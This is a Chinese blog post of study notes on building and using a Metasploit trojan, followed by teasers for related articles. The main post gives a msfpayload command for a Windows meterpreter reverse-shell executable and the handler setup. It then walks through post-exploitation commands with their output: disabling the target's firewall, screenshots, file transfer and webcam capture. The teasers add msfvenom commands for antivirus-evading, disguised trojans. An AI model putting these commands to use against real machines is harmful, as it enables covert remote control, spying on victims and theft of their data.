msf学习之木马

最新推荐文章于 2024-09-19 20:22:04 发布
最新推荐文章于 2024-09-19 20:22:04 发布
阅读量2.1k 收藏 9
点赞数 2
分类专栏: 学习笔记 文章标签: msf 木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fake_hydra/article/details/76323793
版权
msfpayload windows/meterpreter/reverse_tcp LHOST=10.24.194.155 LPORT=55555 X >text.exe


生成一个text.exe的木马文件

msf > use exploit/multi/handler
使用handler这个模块

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
使用这个shellcode

LHOST :10.24.194.155
LPORT :55555

这里填生成木马的ip 和端口

expload
先执行msf,在执行木马

由于开了360,开始就查杀了,添加信任后还是没用,然后就把360关了,再次打开,返回了个 已杀死 一脸懵逼的我。。

之后的命令。。。用help看吧。。。

把防火墙 360 都关了之后,成功了,啊哈,

meterpreter > getuid
Server username: JINC\asus
查看权限
>ps 查看进程,由于太多就不放这了

meterpreter > sysinfo 查看基本信息
Computer : JINC
OS : Windows 8 (Build 9200).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Meterpreter : x86/win32

meterpreter > idletime 查看目标系统的闲置时间
User has been idle for: 0 secs

>run getcountermeasure 查看目标防火墙



>run getcountermeasure -d -k 关闭防火墙

我是关闭之后才成功的。。所以。。。。。。。。

meterpreter > screenshot 远程主机截图 ,图片放在root 下
Screenshot saved to: /root/bcQCpPTR.jpeg

meterpreter > upload /root/bcQCpPTR.jpeg -r d:\\ 上传本机文件到目标机 (-r 指定目录)
[*] uploading : /root/bcQCpPTR.jpeg -> d://
[*] uploaded : /root/bcQCpPTR.jpeg -> d://\bcQCpPTR.jpeg

meterpreter > search -d d:// -f bcQCpPTR.jpeg 查询指定文件
meterpreter > download d:\\bcQCpPTR.jpeg -r /root 从目标机下载文件到本机
[*] downloading: d:\bcQCpPTR.jpeg -> /root/bcQCpPTR.jpeg
[*] downloaded : d:\bcQCpPTR.jpeg -> /root/bcQCpPTR.jpeg

meterpreter > webcam_list 查看目标机摄像头
1: USB Camera
meterpreter > webcam_snap 打开


下课了,就先到这
Ahri-情书
关注
专栏目录
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 4035
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
学习笔记】msf-java木马源码分析
rm -rf *
01-31 941
metasploit-java木马-源码学习
msf_木马
jinhezhai的博客
05-13 2328
使用kali虚拟机生成木马使win7虚拟机中毒,并控制kali虚拟机 1.制作木马 打开kali虚拟机 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -b " x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/ 西瓜影音 .exe 使用msfvenom生成木马, 在渗透过程中,MSF漏洞利用
MSF的使用学习
最新发布
2302_80097039的博客
09-19 1063
更新安装包信息;只检查,不更新(已安装的软件包是否有可用的更新,给出汇总报告)# 更新已安装的软件包,不删除旧包;# 升级包,删除旧包二、使用方法使用方法:1. 基础使用:#进入框架# 使用search命令查找相关漏洞# 使用use进入模块#使用info查看模块信息#设置攻击载荷#查看模块需要配置的参数#设置参数#攻击后渗透阶段 #后渗透阶段。
msf木马程序
ZZ100861122的博客
11-10 608
目录 捆绑木马 生成木马文件 附:msfvenom介绍 msfvenom简介 msfvenom生成 exploit/multi/handler模块简介 设置监听反弹 发送木马 查看对方的ip 查看对方目录 截图 开启摄像头 附:Meterpreter常用命令 进一步获取权限 伪装 捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ 在这里插入图片描述 把它
【网络安全】 MSF生成木马教程
一直被模仿,从未被超越
03-13 1739
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
msf生成木马
qq_44657899的博客
04-03 4251
Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe msfvenom -p windows/meterpreter/bind_tcp LPORT=<Attack Port> -f dll >/root/bind_xx.dll msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST
学习记录(木马篇)
lfflzh22的专栏
11-02 395
今天看到书中写的关于将自己加载为windows服务的木马,于是乎,上网搜索了关于windows服务编程的资料,不得不说。。。中文版的资料真的是太糟糕了,乱七八糟的,中文语法都不对,直接谷歌翻译的吧?只好看英文了。。。。不过windows服务机制还挺有意思的,但个人感觉比较复杂。。。让我再研究研究,写好了,就把第一个成品发上来。
【网络安全】 MSF生成木马教程(1)
2401_84263282的博客
04-28 472
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。最后就是项目实战,这里带来的是。
2024年网络安全最新【网络安全】 MSF生成木马教程
2401_84281712的博客
05-03 357
这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**2、查看权限,当客户机是普通用户登录的话,此时获取到的就是一个普通 user 权限。1、当出现 meterpreter,表示成功入侵。2、设置Payload。
kali msf 木马
07-26
Kali Linux Metasploit Framework (Msf) 是一款广泛用于网络安全渗透测试、漏洞评估和黑客工具的开源平台。Metasploit 的核心组件是...这种木马常用于教学、红队演练和安全培训中,帮助学习者理解攻击过程和防御策略。
MSF学习
willow_liang的博客
12-03 2013
目录 Metasploit模块 主机扫描 查找扫描模块 使用扫描模块 使用nmap扫描 搜索和使用samba的漏洞利用模块 后渗透攻击:信息收集 使用ms17-010对win7进行渗透 进程迁移 查看系统信息 截图 文件系统命令 权限提升 将meterpreter转换为后台执行 令牌窃取 hash攻击 或者上传pwdump,wce工具获取hash 使用mimikatz抓取密码 后渗透攻击:后门 1.Cymothoa后门 2.Persistence后门 3.w.
(菜鸟自学)木马与后门技术
nbdlsplyb的博客
12-15 3850
它依赖于用户的行为,需要用户主动运行或安装木马文件。通过保持警惕,使用可信赖的安全软件,及时更新系统和应用程序,并避免点击可疑链接和下载未知来源的文件,可以有效减少木马对计算机和个人信息的风险。”,该路径是系统中的临时文件夹,系统会自动选中“”绝对路径,然后勾选“保存和还原路径”,选项允许自解压程序在注册表中存储用户输入的目标路径,并在自解压文件下一次运行时使用相同的解压路径。这些都是常见的木马分类,但需要注意的是,随着恶意软件技术的不断发展,新型的木马不断出现,可能具有多种复合的功能和特点。
了解“木马”工作原理 学习木马病毒通用解法
派的无理性
11-27 1806
作者:55vn.由于很多新手对安全问题了解不多,所以并不知道自己的计算机中了“木马”该怎么样清除。因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现“木马”。相信你看了这篇文章之后,就会成为一名查杀“木马”的高手了。  “木马”程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把form的visible属性设为false、showintaskbar设为false
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 9399
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
msf免杀木马生成
qq_66985187的博客
07-04 2455
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msfmsfvenom)命令实现免杀的操作。由于免杀技术的涉猎面非常广,其中包含反。简称"免杀",它指的是一种能使病毒木马免于被。补充:常见的后门生成方式!在kali中生成常见的木马命令。
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4761
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
msf上制作简单的windows exe木马
weixin_73942557的博客
10-25 948
msf制作Windows可执行程序木马并利用。首先利用用组件msfvenom制作木马。然后将生成的木马放到你准备的靶机上面。设置payload、监听IP和端口。在靶机上运行生成的木马文件。进入msfconsole。-p设置payload。然后设置返回IP和端口。-f设置生成木马的类型。使用exploit利用。-o设置路径和文件名。目前就已经提权成功了。
003-MSF恶程木马+cs上线
qq_57017823的博客
08-31 343
msfvenom,钓鱼攻击,键盘监听
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值